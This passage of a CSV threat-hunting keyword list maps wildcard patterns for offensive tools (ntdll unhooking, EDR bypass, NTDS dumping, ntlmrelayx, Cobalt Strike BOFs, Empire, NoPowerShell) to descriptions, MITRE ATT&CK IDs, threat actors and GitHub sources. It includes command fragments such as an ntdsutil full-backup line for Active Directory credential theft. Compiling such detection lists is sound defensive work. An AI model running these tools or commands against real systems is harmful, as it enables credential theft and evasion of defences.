+"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2534","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" +"*notepad FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*notredamecheatstowin>*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*novelbfh.zip*","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" +"*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*npgimkapccfidfkfoklhpkgmhgfejhbj*","greyware_tool_keyword","BelkaVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nping *","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps_payload*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*nps_payload.py*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*nps_payload-master*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*nrf24-scanner.py -l -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nrpc.py*","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" +"*nse_install.py*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*nse-insall-0.0.1*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*nse-install *","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*nse-install-master*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*nselib/data/passwords.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*NtCreateUserProcessShellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*ntdissector -*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*Ntdll_SusProcess.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*NTDLLReflection-main*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*NtdllUnpatcher.cpp*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher.dll*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher.lib*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher.log*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher.obj*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher.sln*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher_Injector*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*NtdllUnpatcher-master*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ntdsdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ntdsutil *ac i ntds* *create full*\temp*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ntdsutil.exe *ac i ntds*ifm*create full *temp*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ntlm-info.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*ntlmquic.*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*ntlmquic-go*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*ntlmquic-master*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*ntlmrecon *","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*ntlmrecon.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*ntlmrecon:main*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*ntlmrecon-fromfile.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*NTLMRecon-master*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*ntlmrecon-ranges.csv*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*NTLMRelay2Self.git*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*ntlmrelayx -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ntlmrelayx --*","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 